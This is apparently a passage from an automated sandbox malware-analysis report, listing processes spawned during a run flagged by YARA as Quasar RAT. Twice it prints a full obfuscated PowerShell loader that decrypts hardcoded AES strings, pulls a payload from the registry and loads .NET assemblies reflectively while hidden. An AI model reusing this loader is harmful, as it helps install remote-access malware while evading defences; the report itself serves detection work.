                                                                                                          Commandline:C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
                                                                                                          Imagebase:0x7ff654820000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000F.00000002.3389530773.000001FABCF5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000F.00000002.3570248897.000001FACCBC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000F.00000002.3570248897.000001FACD23D000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          • Detection: 0%, Virustotal, Browse
                                                                                                          Has exited:false

                                                                                                          Target ID:16
                                                                                                          Start time:16:35:20
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{8c0db931-f9fd-42d4-a5c0-43590a2016f6}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:17
                                                                                                          Start time:16:35:20
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{c14234ed-73ac-4d78-a200-79518435a2b0}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:19
                                                                                                          Start time:16:35:24
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\$sxr-powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6400).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
                                                                                                          Imagebase:0x7ff654820000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                          Has exited:false

                                                                                                          Target ID:20
                                                                                                          Start time:16:35:24
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{cbe0811f-76a5-44cc-bdc5-f8341ab968a9}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:21
                                                                                                          Start time:16:35:24
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{e8c47de4-1fa8-45ae-ba48-1e652857c9f1}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:22
                                                                                                          Start time:16:35:24
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\winlogon.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:winlogon.exe
                                                                                                          Imagebase:0x7ff70f350000
                                                                                                          File size:906'240 bytes
                                                                                                          MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:23
                                                                                                          Start time:16:35:25
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{38d5fde3-99ae-4373-8c2f-8b4f5f08f7f3}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:24
                                                                                                          Start time:16:35:25
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\lsass.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\lsass.exe
                                                                                                          Imagebase:0x7ff7ac940000
                                                                                                          File size:59'456 bytes
                                                                                                          MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:25
                                                                                                          Start time:16:35:25
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:26
                                                                                                          Start time:16:35:25
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dwm.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:dwm.exe
                                                                                                          Imagebase:0x7ff68eb30000
                                                                                                          File size:94'720 bytes
                                                                                                          MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:27
                                                                                                          Start time:16:35:26
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{92e841ec-e3f1-4b8b-895f-b885255cbce1}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:28
                                                                                                          Start time:16:35:26
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus
                                                                                                          Imagebase:0xd50000
                                                                                                          File size:144'896 bytes
                                                                                                          MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:29
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:30
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{25768c7a-7ac5-4718-a464-d7bd931650f7}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:31
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{2e416721-4f03-488b-85bf-d48d4305e55d}
